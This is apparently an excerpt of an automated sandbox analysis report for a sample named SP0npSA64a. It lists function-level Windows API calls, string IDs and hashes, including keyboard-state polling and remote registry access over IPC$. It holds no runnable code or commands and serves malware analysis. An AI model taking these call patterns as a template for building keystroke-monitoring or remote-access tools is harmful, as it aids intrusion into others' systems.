                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3218148540-0
                                                                                  • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                  • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                  • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                  • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                  • String ID:
                                                                                  • API String ID: 136442275-0
                                                                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                  APIs
                                                                                  • _wcsncpy.LIBCMT ref: 00467490
                                                                                  • _wcsncpy.LIBCMT ref: 004674BC
                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                  • _wcstok.LIBCMT ref: 004674FF
                                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                  • String ID: X
                                                                                  • API String ID: 3104067586-3081909835
                                                                                  • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                  • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                  • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                  • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                  • _wcslen.LIBCMT ref: 004610A3
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                  • String ID: ThumbnailClass
                                                                                  • API String ID: 4136854206-1241985126
                                                                                  • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                  • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                  • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                  • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                  APIs
                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                  • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                  • String ID: 2
                                                                                  • API String ID: 1331449709-450215437
                                                                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                  • API String ID: 3054410614-2561132961
                                                                                  • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                  • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                  • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                  • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                  APIs
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                  • API String ID: 600699880-22481851
                                                                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow
                                                                                  • String ID: static
                                                                                  • API String ID: 3375834691-2160076837
                                                                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                  • API String ID: 2907320926-3566645568
                                                                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                  APIs
                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                  • DeleteObject.GDI32(8FF3F137), ref: 00470A04
                                                                                  • DestroyIcon.USER32(08001CDF), ref: 00470A1C
                                                                                  • DeleteObject.GDI32(03071C50), ref: 00470A34
                                                                                  • DestroyWindow.USER32(03076A58), ref: 00470A4C
                                                                                  • DestroyIcon.USER32(?), ref: 00470A73
                                                                                  • DestroyIcon.USER32(?), ref: 00470A81
                                                                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1237572874-0
                                                                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                  • GetKeyState.USER32(00000011), ref: 00444903
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3413494760-0
                                                                                  • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                  • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
